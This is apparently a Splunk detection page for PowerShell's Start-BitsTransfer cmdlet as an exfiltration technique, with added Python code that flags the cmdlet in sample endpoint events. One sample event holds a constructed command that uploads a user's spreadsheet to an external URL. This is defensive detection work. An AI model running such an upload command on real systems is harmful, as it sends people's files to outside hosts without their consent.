PowerShell Start-BitsTransfer

Splunk Security Content

Summary
This analytic detects execution of the PowerShell cmdlet `Start-BitsTransfer`, which is commonly used for file transfer operations and can be leveraged by adversaries for data exfiltration. It relies on process creation events and their command-line arguments as collected by Endpoint Detection and Response (EDR) telemetry, which lets security teams spot activity indicative of possible threats. Because the cmdlet has legitimate administrative uses, the risk lies in its abuse to upload sensitive data to unauthorized external locations, so confirming whether a given execution is malicious is an important step in preventing sensitive data breaches.
Categories
  • Endpoint
  • Cloud
Data Sources
  • Process
  • Windows Registry
  • Application Log
ATT&CK Techniques
  • T1197
Created: 2024-11-13
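As an added illustration of the detection logic the summary describes (example code, not Splunk's own search or telemetry), the following runs over constructed EDR process-creation events, flags `Start-BitsTransfer` launched from a PowerShell host and rates upload transfers to a remote URL higher than ordinary downloads. Field names, hosts, users and URLs are assumptions.

```python
import re

# Constructed sample EDR process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": r"CORP\alice",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Start-BitsTransfer -Source C:\Users\alice\Documents\q3.xlsx -Destination https://files.example.net/up -TransferType Upload"'},
    {"host": "ws02", "user": r"CORP\svc_patch",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": r'pwsh.exe -c "start-bitstransfer -Source https://updates.example.com/agent.msi -Destination C:\Temp\agent.msi"'},
    {"host": "ws03", "user": r"CORP\bob",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo Start-BitsTransfer"},
    {"host": "ws04", "user": r"CORP\carol",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -Command "Get-Process | Sort-Object CPU"'},
]

# Process names treated as PowerShell hosts (assumed set).
PS_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
CMDLET_RE = re.compile(r"start-bitstransfer", re.IGNORECASE)

def _param(cmdline, name):
    """Value of -<name> on the command line, or None. Full parameter names only;
    PowerShell prefix abbreviations (e.g. -Dest) are not resolved here."""
    m = re.search(r'-%s\s+("[^"]*"|\S+)' % name, cmdline, re.IGNORECASE)
    return m.group(1).strip('"') if m else None

def is_powershell(image):
    return image.rsplit("\\", 1)[-1].lower() in PS_HOSTS

def classify(event):
    """Alert dict for a PowerShell Start-BitsTransfer invocation, else None."""
    if not is_powershell(event["image"]):
        return None
    cmd = event["cmdline"]
    if not CMDLET_RE.search(cmd):
        return None
    ttype = (_param(cmd, "TransferType") or "Download").lower()  # cmdlet default is Download
    dest = _param(cmd, "Destination") or ""
    # Upload jobs push local data to a remote URL: the exfiltration case the summary
    # describes. Downloads from a remote URL are the ordinary administrative use.
    if ttype.startswith("upload"):
        risk = "high" if re.match(r"https?://", dest, re.IGNORECASE) else "medium"
    else:
        risk = "low"
    return {"host": event["host"], "user": event["user"], "transfer_type": ttype,
            "source": _param(cmd, "Source"), "destination": dest, "risk": risk}

def run_detection(events):
    """Apply classify() to every event and keep the matches, in input order."""
    return [a for a in (classify(e) for e in events) if a]
```

Command lines passed via `-EncodedCommand` will not contain the cmdlet name in clear text, so a production search should also decode those or rely on script block logging.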